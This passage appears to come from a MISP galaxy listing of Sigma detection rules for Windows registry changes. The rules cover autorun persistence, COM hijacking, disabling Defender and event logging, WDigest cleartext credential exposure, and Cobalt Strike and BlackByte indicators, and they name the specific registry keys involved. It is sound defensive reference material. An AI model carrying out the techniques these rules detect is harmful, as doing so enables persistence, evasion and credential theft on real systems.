falsepositive ['Administrator actions']
filename registry_set_enabling_turnoffcheck.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Potential Signing Bypass Via Windows Developer Features - Registry

Detects when the enablement of developer features such as "Developer Mode" or "Application Sideloading". Which allows the user to install untrusted packages.

Internal MISP references

UUID b110ebaf-697f-4da1-afd5-b536fa27a2c1 which can be used as unique global reference for Potential Signing Bypass Via Windows Developer Features - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/12
falsepositive ['Unknown']
filename registry_set_turn_on_dev_features.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion']

Session Manager Autorun Keys Modification

Detects modification of autostart extensibility point (ASEP) in registry.

Internal MISP references

UUID 046218bd-e0d8-4113-a3c3-895a12b2b298 which can be used as unique global reference for Session Manager Autorun Keys Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
creation_date 2019/10/25
falsepositive ['Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason', 'Legitimate administrator sets up autorun keys for legitimate reason']
filename registry_set_asep_reg_keys_modification_session_manager.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1547.001', 'attack.t1546.009']
Related clusters

To see the related clusters, click here.

Add Debugger Entry To Hangs Key For Persistence

Detects when an attacker adds a new "Debugger" value to the "Hangs" key in order to achieve persistence which will get invoked when an application crashes

Internal MISP references

UUID 833ef470-fa01-4631-a79b-6f291c9ac498 which can be used as unique global reference for Add Debugger Entry To Hangs Key For Persistence in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/21
falsepositive ['This value is not set by default but could be rarly used by administrators']
filename registry_set_hangs_debugger_persistence.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence']

Potential PowerShell Execution Policy Tampering

Detects changes to the PowerShell execution policy in order to bypass signing requirements for script execution

Internal MISP references

UUID fad91067-08c5-4d1a-8d8c-d96a21b37814 which can be used as unique global reference for Potential PowerShell Execution Policy Tampering in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/11
falsepositive ['Unknown']
filename registry_set_powershell_execution_policy.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion']

COM Hijack via Sdclt

Detects changes to 'HKCU\Software\Classes\Folder\shell\open\command\DelegateExecute'

Internal MISP references

UUID 07743f65-7ec9-404a-a519-913db7118a8d which can be used as unique global reference for COM Hijack via Sdclt in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Omkar Gudhate
creation_date 2020/09/27
falsepositive ['Unknown']
filename registry_set_comhijack_sdclt.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1546', 'attack.t1548']
Related clusters

To see the related clusters, click here.

Winlogon Notify Key Logon Persistence

Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.

Internal MISP references

UUID bbf59793-6efb-4fa1-95ca-a7d288e52c88 which can be used as unique global reference for Winlogon Notify Key Logon Persistence in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/30
falsepositive ['Unknown']
filename registry_set_winlogon_notify_key.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1547.004']
Related clusters

To see the related clusters, click here.

Blackbyte Ransomware Registry

BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption

Internal MISP references

UUID 83314318-052a-4c90-a1ad-660ece38d276 which can be used as unique global reference for Blackbyte Ransomware Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/24
falsepositive ['Unknown']
filename registry_set_blackbyte_ransomware.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Potential CobaltStrike Service Installations - Registry

Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement.

Internal MISP references

UUID 61a7697c-cb79-42a8-a2ff-5f0cdfae0130 which can be used as unique global reference for Potential CobaltStrike Service Installations - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Wojciech Lesicki
creation_date 2021/06/29
falsepositive ['Unlikely']
filename registry_set_cobaltstrike_service_installs.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.execution', 'attack.privilege_escalation', 'attack.lateral_movement', 'attack.t1021.002', 'attack.t1543.003', 'attack.t1569.002']
Related clusters

To see the related clusters, click here.

Running Chrome VPN Extensions via the Registry 2 VPN Extension

Running Chrome VPN Extensions via the Registry install 2 vpn extension

Internal MISP references

UUID b64a026b-8deb-4c1d-92fd-98893209dff1 which can be used as unique global reference for Running Chrome VPN Extensions via the Registry 2 VPN Extension in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/28
falsepositive ['Unknown']
filename registry_set_chrome_extension.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1133']
Related clusters

To see the related clusters, click here.

Potential Persistence Via Visual Studio Tools for Office

Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications.

Internal MISP references

UUID 9d15044a-7cfe-4d23-8085-6ebc11df7685 which can be used as unique global reference for Potential Persistence Via Visual Studio Tools for Office in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bhabesh Raj
creation_date 2021/01/10
falsepositive ['Legitimate Addin Installation']
filename registry_set_persistence_office_vsto.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.t1137.006', 'attack.persistence']
Related clusters

To see the related clusters, click here.

Wow6432Node CurrentVersion Autorun Keys Modification

Detects modification of autostart extensibility point (ASEP) in registry.

Internal MISP references

UUID b29aed60-ebd1-442b-9cb5-16a1d0324adb which can be used as unique global reference for Wow6432Node CurrentVersion Autorun Keys Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
creation_date 2019/10/25
falsepositive ['Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason', 'Legitimate administrator sets up autorun keys for legitimate reason']
filename registry_set_asep_reg_keys_modification_wow6432node.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1547.001']
Related clusters

To see the related clusters, click here.

Suspicious Keyboard Layout Load

Detects the keyboard preload installation with a suspicious keyboard layout, e.g. Chinese, Iranian or Vietnamese layout load in user session on systems maintained by US staff only

Internal MISP references

UUID 34aa0252-6039-40ff-951f-939fd6ce47d8 which can be used as unique global reference for Suspicious Keyboard Layout Load in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019/10/12
falsepositive ["Administrators or users that actually use the selected keyboard layouts (heavily depends on the organisation's user base)"]
filename registry_set_susp_keyboard_layout_load.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.resource_development', 'attack.t1588.002']
Related clusters

To see the related clusters, click here.

Disable Tamper Protection on Windows Defender

Detects disabling Windows Defender Tamper Protection

Internal MISP references

UUID 93d298a1-d28f-47f1-a468-d971e7796679 which can be used as unique global reference for Disable Tamper Protection on Windows Defender in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/04
falsepositive ['Unknown']
filename registry_set_disabled_tamper_protection_on_microsoft_defender.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Wdigest Enable UseLogonCredential

Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to enable clear-text credentials

Internal MISP references

UUID d6a9b252-c666-4de6-8806-5561bbbd3bdc which can be used as unique global reference for Wdigest Enable UseLogonCredential in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2019/09/12
falsepositive ['Unknown']
filename registry_set_wdigest_enable_uselogoncredential.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Change the Fax Dll

Detect possible persistence using Fax DLL load when service restart

Internal MISP references

UUID 9e3357ba-09d4-4fbd-a7c5-ad6386314513 which can be used as unique global reference for Change the Fax Dll in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/07/17
falsepositive ['Unknown']
filename registry_set_fax_dll_persistance.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

ETW Logging Disabled For SCM

Detects changes to the "TracingDisabled" key in order to disable ETW logging for services.exe (SCM)

Internal MISP references

UUID 4f281b83-0200-4b34-bf35-d24687ea57c2 which can be used as unique global reference for ETW Logging Disabled For SCM in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/12/09
falsepositive ['Unknown']
filename registry_set_services_etw_tamper.yml
level low
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112', 'attack.t1562']
Related clusters

To see the related clusters, click here.

Disable PUA Protection on Windows Defender

Detects disabling Windows Defender PUA protection

Internal MISP references

UUID 8ffc5407-52e3-478f-9596-0a7371eafe13 which can be used as unique global reference for Disable PUA Protection on Windows Defender in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/04
falsepositive ['Unknown']
filename registry_set_disabled_pua_protection_on_microsoft_defender.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Persistence Via New SIP Provider

Detects when an attacker register a new SIP provider for persistence and defense evasion

Internal MISP references

UUID 5a2b21ee-6aaa-4234-ac9d-59a59edf90a1 which can be used as unique global reference for Persistence Via New SIP Provider in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/21
falsepositive ['Legitimate SIP being registered by the OS or different software.']
filename registry_set_sip_persistence.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.defense_evasion', 'attack.t1553.003']
Related clusters

To see the related clusters, click here.

Classes Autorun Keys Modification

Detects modification of autostart extensibility point (ASEP) in registry.

Internal MISP references

UUID 9df5f547-c86a-433e-b533-f2794357e242 which can be used as unique global reference for Classes Autorun Keys Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
creation_date 2019/10/25
falsepositive ['Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason', 'Legitimate administrator sets up autorun keys for legitimate reason']
filename registry_set_asep_reg_keys_modification_classes.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1547.001']
Related clusters

To see the related clusters, click here.

Potentially Suspicious ODBC Driver Registered

Detects the registration of a new ODBC driver where the driver is located in a potentially suspicious location

Internal MISP references

UUID e4d22291-f3d5-4b78-9a0c-a1fbaf32a6a4 which can be used as unique global reference for Potentially Suspicious ODBC Driver Registered in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/23
falsepositive ['Unlikely']
filename registry_set_odbc_driver_registered_susp.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1003']
Related clusters

To see the related clusters, click here.

Disable Microsoft Defender Firewall via Registry

Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage

Internal MISP references

UUID 974515da-6cc5-4c95-ae65-f97f9150ec7f which can be used as unique global reference for Disable Microsoft Defender Firewall via Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/09
falsepositive ['Unknown']
filename registry_set_disable_defender_firewall.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.004']
Related clusters

To see the related clusters, click here.

Potential Registry Persistence Attempt Via DbgManagedDebugger

Detects the addition of the "Debugger" value to the "DbgManagedDebugger" key in order to achieve persistence. Which will get invoked when an application crashes

Internal MISP references

UUID 9827ae57-3802-418f-994b-d5ecf5cd974b which can be used as unique global reference for Potential Registry Persistence Attempt Via DbgManagedDebugger in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/08/07
falsepositive ['Legitimate use of the key to setup a debugger. Which is often the case on developers machines']
filename registry_set_dbgmanageddebugger_persistence.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1574']
Related clusters

To see the related clusters, click here.

Uncommon Microsoft Office Trusted Location Added

Detects changes to registry keys related to "Trusted Location" of Microsoft Office where the path is set to something uncommon. Attackers might add additional trusted locations to avoid macro security restrictions.

Internal MISP references

UUID f742bde7-9528-42e5-bd82-84f51a8387d2 which can be used as unique global reference for Uncommon Microsoft Office Trusted Location Added in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/06/21
falsepositive ['Other unknown legitimate or custom paths need to be filtered to avoid false positives']
filename registry_set_office_trusted_location_uncommon.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Disable Privacy Settings Experience in Registry

Detects registry modifications that disable Privacy Settings Experience

Internal MISP references

UUID 0372e1f9-0fd2-40f7-be1b-a7b2b848fa7b which can be used as unique global reference for Disable Privacy Settings Experience in Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/10/02
falsepositive ['Legitimate admin script']
filename registry_set_disable_privacy_settings_experience.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Usage of Renamed Sysinternals Tools - RegistrySet

Detects non-sysinternals tools setting the "accepteula" key which normally is set on sysinternals tool execution

Internal MISP references

UUID 8023f872-3f1d-4301-a384-801889917ab4 which can be used as unique global reference for Usage of Renamed Sysinternals Tools - RegistrySet in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/24
falsepositive ['Unlikely']
filename registry_set_renamed_sysinternals_eula_accepted.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.resource_development', 'attack.t1588.002']
Related clusters

To see the related clusters, click here.

COM Hijacking via TreatAs

Detect modification of TreatAs key to enable "rundll32.exe -sta" command

Internal MISP references

UUID dc5c24af-6995-49b2-86eb-a9ff62199e82 which can be used as unique global reference for COM Hijacking via TreatAs in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/08/28
falsepositive ['Legitimate use']
filename registry_set_treatas_persistence.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1546.015']
Related clusters

To see the related clusters, click here.

PowerShell Script Execution Policy Enabled

Detects the enabling of the PowerShell script execution policy. Once enabled, this policy allows scripts to be executed.

Internal MISP references

UUID 8218c875-90b9-42e2-b60d-0b0069816d10 which can be used as unique global reference for PowerShell Script Execution Policy Enabled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Thurein Oo
creation_date 2023/10/18
falsepositive ['Likely']
filename registry_set_powershell_enablescripts_enabled.yml
level low
logsource.category registry_set
logsource.product windows
tags ['attack.execution']

New File Association Using Exefile

Detects the abuse of the exefile handler in new file association. Used for bypass of security products.

Internal MISP references

UUID 44a22d59-b175-4f13-8c16-cbaef5b581ff which can be used as unique global reference for New File Association Using Exefile in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Andreas Hunkeler (@Karneades)
creation_date 2021/11/19
falsepositive ['Unknown']
filename registry_set_file_association_exefile.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion']

Disable Windows Event Logging Via Registry

Detects tampering with the "Enabled" registry key in order to disable Windows logging of a Windows event channel

Internal MISP references

UUID 2f78da12-f7c7-430b-8b19-a28f269b77a3 which can be used as unique global reference for Disable Windows Event Logging Via Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/04
falsepositive ['Rare falsepositives may occur from legitimate administrators disabling specific event log for troubleshooting']
filename registry_set_disable_winevt_logging.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.002']
Related clusters

To see the related clusters, click here.

New BgInfo.EXE Custom VBScript Registry Configuration

Detects setting of a new registry value related to BgInfo configuration, which can be abused to execute custom VBScript via "BgInfo.exe"

Internal MISP references

UUID 992dd79f-dde8-4bb0-9085-6350ba97cfb3 which can be used as unique global reference for New BgInfo.EXE Custom VBScript Registry Configuration in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/08/16
falsepositive ['Legitimate VBScript']
filename registry_set_bginfo_custom_vbscript.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Registry Persistence via Service in Safe Mode

Detects the modification of the registry to allow a driver or service to persist in Safe Mode.

Internal MISP references

UUID 1547e27c-3974-43e2-a7d7-7f484fb928ec which can be used as unique global reference for Registry Persistence via Service in Safe Mode in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/04/04
falsepositive ['Unknown']
filename registry_set_add_load_service_in_safe_mode.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1564.001']
Related clusters

To see the related clusters, click here.

Scheduled TaskCache Change by Uncommon Program

Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious

Internal MISP references

UUID 4720b7df-40c3-48fd-bbdf-fd4b3c464f0d which can be used as unique global reference for Scheduled TaskCache Change by Uncommon Program in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Syed Hasan (@syedhasan009)
creation_date 2021/06/18
falsepositive ['Unknown']
filename registry_set_taskcache_entry.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1053', 'attack.t1053.005']
Related clusters

To see the related clusters, click here.

Macro Enabled In A Potentially Suspicious Document

Detects registry changes to Office trust records where the path is located in a potentially suspicious location

Internal MISP references

UUID a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd which can be used as unique global reference for Macro Enabled In A Potentially Suspicious Document in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/06/21
falsepositive ['Unlikely']
filename registry_set_office_trust_record_susp_location.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Suspicious Powershell In Registry Run Keys

Detects potential PowerShell commands or code within registry run keys

Internal MISP references

UUID 8d85cf08-bf97-4260-ba49-986a2a65129c which can be used as unique global reference for Suspicious Powershell In Registry Run Keys in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Florian Roth (Nextron Systems)
creation_date 2022/03/17
falsepositive ['Legitimate admin or third party scripts. Baseline according to your environment']
filename registry_set_powershell_in_run_keys.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1547.001']
Related clusters

To see the related clusters, click here.

Registry Persistence via Explorer Run Key

Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder

Internal MISP references

UUID b7916c2a-fa2f-4795-9477-32b731f70f11 which can be used as unique global reference for Registry Persistence via Explorer Run Key in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), oscd.community
creation_date 2018/07/18
falsepositive ['Unknown']
filename registry_set_susp_reg_persist_explorer_run.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1547.001']
Related clusters

To see the related clusters, click here.

Potential Persistence Via GlobalFlags

Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys

Internal MISP references

UUID 36803969-5421-41ec-b92f-8500f79c23b0 which can be used as unique global reference for Potential Persistence Via GlobalFlags in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Karneades, Jonhnathan Ribeiro, Florian Roth
creation_date 2018/04/11
falsepositive ['Unknown']
filename registry_set_persistence_globalflags.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.privilege_escalation', 'attack.persistence', 'attack.defense_evasion', 'attack.t1546.012', 'car.2013-01-002']
Related clusters

To see the related clusters, click here.

Persistence Via Disk Cleanup Handler - Autorun

Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence via autorun. The disk cleanup manager is part of the operating system. It displays the dialog box […] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI. Although Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications. Instead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler. Any developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.

Internal MISP references

UUID d4e2745c-f0c6-4bde-a3ab-b553b3f693cc which can be used as unique global reference for Persistence Via Disk Cleanup Handler - Autorun in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/21
falsepositive ['Unknown']
filename registry_set_disk_cleanup_handler_autorun_persistence.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence']

Potential Persistence Via Excel Add-in - Registry

Detect potential persistence via the creation of an excel add-in (XLL) file to make it run automatically when Excel is started.

Internal MISP references

UUID 961e33d1-4f86-4fcf-80ab-930a708b2f82 which can be used as unique global reference for Potential Persistence Via Excel Add-in - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2023/01/15
falsepositive ['Unknown']
filename registry_set_persistence_xll.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1137.006']
Related clusters

To see the related clusters, click here.

Potential Persistence Via MyComputer Registry Keys

Detects modification to the "Default" value of the "MyComputer" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example)

Internal MISP references

UUID 8fbe98a8-8f9d-44f8-aa71-8c572e29ef06 which can be used as unique global reference for Potential Persistence Via MyComputer Registry Keys in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/09
falsepositive ['Unlikely but if you experience FPs add specific processes and locations you would like to monitor for']
filename registry_set_persistence_mycomputer.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence']

New RUN Key Pointing to Suspicious Folder

Detects suspicious new RUN key element pointing to an executable in a suspicious folder

Internal MISP references

UUID 02ee49e2-e294-4d0f-9278-f5b3212fc588 which can be used as unique global reference for New RUN Key Pointing to Suspicious Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing
creation_date 2018/08/25
falsepositive ['Software using weird folders for updates']
filename registry_set_susp_run_key_img_folder.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1547.001']
Related clusters

To see the related clusters, click here.

Custom File Open Handler Executes PowerShell

Detects the abuse of custom file open handler, executing powershell

Internal MISP references

UUID 7530b96f-ad8e-431d-a04d-ac85cc461fdc which can be used as unique global reference for Custom File Open Handler Executes PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author CD_R0M_
creation_date 2022/06/11
falsepositive ['Unknown']
filename registry_set_custom_file_open_handler_powershell_execution.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1202']
Related clusters

To see the related clusters, click here.

Potential SentinelOne Shell Context Menu Scan Command Tampering

Detects potentially suspicious changes to the SentinelOne context menu scan command by a process other than SentinelOne.

Internal MISP references

UUID 6c304b02-06e6-402d-8be4-d5833cdf8198 which can be used as unique global reference for Potential SentinelOne Shell Context Menu Scan Command Tampering in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2024/03/06
falsepositive ['Unknown']
filename registry_set_sentinelone_shell_context_tampering.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence']

Service Binary in Suspicious Folder

Detect the creation of a service with a service binary located in a suspicious directory

Internal MISP references

UUID a07f0359-4c90-4dc4-a681-8ffea40b4f47 which can be used as unique global reference for Service Binary in Suspicious Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), frack113
creation_date 2022/05/02
falsepositive ['Unknown']
filename registry_set_creation_service_susp_folder.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

NET NGenAssemblyUsageLog Registry Key Tamper

Detects changes to the NGenAssemblyUsageLog registry key. .NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section). By simplify specifying an arbitrary value (e.g. fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created.

Internal MISP references

UUID 28036918-04d3-423d-91c0-55ecf99fb892 which can be used as unique global reference for NET NGenAssemblyUsageLog Registry Key Tamper in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/11/18
falsepositive ['Unknown']
filename registry_set_net_cli_ngenassemblyusagelog.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Common Autorun Keys Modification

Detects modification of autostart extensibility point (ASEP) in registry.

Internal MISP references

UUID f59c3faf-50f3-464b-9f4c-1b67ab512d99 which can be used as unique global reference for Common Autorun Keys Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), wagga (name)
creation_date 2019/10/25
falsepositive ['Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason', 'Legitimate administrator sets up autorun keys for legitimate reason']
filename registry_set_asep_reg_keys_modification_common.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1547.001']
Related clusters

To see the related clusters, click here.

ETW Logging Disabled For rpcrt4.dll

Detects changes to the "ExtErrorInformation" key in order to disable ETW logging for rpcrt4.dll

Internal MISP references

UUID 90f342e1-1aaa-4e43-b092-39fda57ed11e which can be used as unique global reference for ETW Logging Disabled For rpcrt4.dll in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/12/09
falsepositive ['Unknown']
filename registry_set_rpcrt4_etw_tamper.yml
level low
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112', 'attack.t1562']
Related clusters

To see the related clusters, click here.

Potential Persistence Via Scrobj.dll COM Hijacking

Detect use of scrobj.dll as this DLL looks for the ScriptletURL key to get the location of the script to execute

Internal MISP references

UUID fe20dda1-6f37-4379-bbe0-a98d400cae90 which can be used as unique global reference for Potential Persistence Via Scrobj.dll COM Hijacking in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/08/20
falsepositive ['Legitimate use of the dll.']
filename registry_set_persistence_scrobj_dll.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1546.015']
Related clusters

To see the related clusters, click here.

Allow RDP Remote Assistance Feature

Detect enable rdp feature to allow specific user to rdp connect on the targeted machine

Internal MISP references

UUID 37b437cf-3fc5-4c8e-9c94-1d7c9aff842b which can be used as unique global reference for Allow RDP Remote Assistance Feature in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/08/19
falsepositive ['Legitimate use of the feature (alerts should be investigated either way)']
filename registry_set_allow_rdp_remote_assistance_feature.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

RDP Sensitive Settings Changed

Detects tampering of RDP Terminal Service/Server sensitive settings. Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc

Internal MISP references

